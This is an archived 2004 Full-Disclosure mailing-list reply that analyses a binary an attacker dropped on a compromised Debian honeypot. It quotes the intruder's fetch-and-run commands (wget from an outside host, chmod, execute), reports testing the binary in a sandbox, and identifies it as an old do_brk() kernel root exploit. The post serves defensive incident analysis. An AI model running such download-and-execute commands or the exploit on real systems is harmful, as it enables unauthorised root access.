Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning

From: Andrew Farmer (andfarm_at_teknovis.com)
Date: 08/27/04

Next message: Sune Kloppenborg Jeppesen: "[Full-Disclosure] [ GLSA 200408-27 ] Gaim: New vulnerabilities"

Previous message: opticfiber: "[Full-Disclosure] Power Quest Deploy Center 5.5 boot disks"
In reply to: Blue Boar: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Next in thread: Christian: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Reply: Christian: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: Mailing List - Full-Disclosure <full-disclosure@lists.netsys.com>
Date: Fri, 27 Aug 2004 11:41:09 -0700

On 26 Aug 2004, at 14:12, Blue Boar wrote:
> Todd Towles wrote:
>> It could be, but he said it was patched. I didn't run the test of
>> course. I never said it was the kernel however, it could be a service
>> running.
>> And unknown does not equal zero-day. But the tool got root and he
>> doesn't know how. That is the point. Kernel, old service, whatever. It
>> would be nice to find it.
>
> If you take a look at this bit:
>
> wget www.bo2k-rulez.net/a
> chmod +x a
> ./a
>
> The file "a" gives every superficial indication that it's a kernel
> exploit, if you want to go by a 20-second Notepad analysis:

Whatever it is, it doesn't work under 2.6.7:

        peon % ./a
(long pause)
        [-] Unable to determine kernel address: Operation not supported
        zsh: segmentation fault ./a
        peon %

It may, however, have corrupted some binaries, including /bin/rm and
/bin/sync, causing
them to crash (SIGSEGV) on invocation. Fortunately, I was working in a
(honeypot-mode)
UML, so my main system's fine :-)

Strings in the binary match
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php ,
which is an oldish do_brk() exploit. For the curious, though, a trimmed
dissasembly
is attached. (I removed portions of the binary which looked like they
were from
libraries.) The symbol names all match up, so I'm pretty confident
they're the same
code.

Looks like that Debian honeypot wasn't as up-to-date as hoped.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/x-gzip attachment: a.objdump.gz

application/pgp-signature attachment: This is a digitally signed message part

Next message: Sune Kloppenborg Jeppesen: "[Full-Disclosure] [ GLSA 200408-27 ] Gaim: New vulnerabilities"

Previous message: opticfiber: "[Full-Disclosure] Power Quest Deploy Center 5.5 boot disks"
In reply to: Blue Boar: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Next in thread: Christian: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Reply: Christian: "Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]